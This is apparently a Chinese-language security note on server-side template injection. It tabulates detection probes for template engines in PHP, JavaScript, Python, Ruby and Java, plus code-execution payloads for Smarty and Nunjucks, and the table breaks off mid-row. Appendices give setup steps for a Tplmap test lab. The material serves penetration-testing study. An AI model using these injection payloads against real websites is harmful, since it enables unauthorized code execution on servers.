服务端模版注入漏洞检测payload整理
服务端模版注入漏洞产生的根源是将用户输入的数据被模版引擎解析渲染可能导致代码执行漏洞
下表涵盖了java,php,python,javascript语言中可能使用到的模版引擎,如果网站存在服务端模版注入在能回显的情况下会将验证栏的数据当模版执行,利用引擎提供的功能进行了计算大部分执行结果都会变成1522756。
|
模版引擎
|
语言
|
验证
|
代码执行
|
盲检测
|
|---|---|---|---|---|
| Smarty(secured) | php | {1234*1234} | x | x |
| Smarty(unsecured) | php | {1234*1234} | {php}echo md5(0xaa);{/php} | |
| twig | php | {{“abcdefg”|upper}} | x | x |
| Nunjucks | javascript | {{1234*1234}} | {{range.constructor(“return+’abcdefghi’.toUpperCase()”)()}} | |
| doT | javascript | {{=1234*1234}} | ||
| Jade | javascript | %0a=1234*1234%0a | ||
| Marko | javascript | ${1234*1234} | ||
| Mako | python | ${1234*1234} | ||
| Jinja2 | python | {{1234*1234}} | ||
| Tornado | python | {{1234*1234}} | ||
| Slim | ruby | =”#{1234*1234}” | ||
| ERB | ruby | <%=”#{1234*1234}”%> | ||
| Freemarker | java | ${(1234*1234)?c} | ||
| Velocity | java |
#set(
|
附录一
升级ruby 查看ruby版本 ruby —version
利用rvm Ruby版本管理器升级 查看支持升级的版本 rvm list known
升级指定版本 rvm install 2.3
rockup命令安装 gem install rock
附录二
安装gradle
# mkdir /opt/gradle
# cd /opt/gradle
# wget https://services.gradle.org/distributions/gradle-3.5-bin.zip
# unzip gradle-3.5-bin.zip
# export PATH=$PATH:/opt/gradle/gradle-3.5/bin
# gradle -v
附录三
安装java1.8 http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html 下载 jdk-8u131-linux-x64.tar.gz
export PATH=$PATH:/opt/java8/jdk1.8.0_131/bin
其他环境搭建
Tplmap 测试环境搭建
php环境
yum install wget php unzip
php -S 0.0.0.0:15002 -t env_php_tests/
nodejs环境
yum install epel-release
yum install nodejs
cd /root/tplmap-master/tests/env_node_tests/lib; node connect-app.js;
java环境
下载相应的rpm包
http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151.html
rpm -ivh jdk-8u131-linux-x64.rpm
mkdir /opt/gradle
cd /opt/gradle
wget https://services.gradle.org/distributions/gradle-3.5-bin.zip
export PATH=$PATH:/opt/gradle/gradle-3.5/bin
ruby环境
利用yum 安装的ruby为2.0.0,不符号要求
安装rvm
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable
source /etc/profile.d/rvm.sh
rvm reload
rvm requirements run #检测并安装依赖
rvm install 2.3.4
gem install cuba
gem install tilt
gem install slim
cd env_ruby_tests/
rackup -o 0.0.0.0 -p 15005
python环境
yum install epel-release
yum install python-pip
pip install mako jinja2 flask tornado
python webserver.py
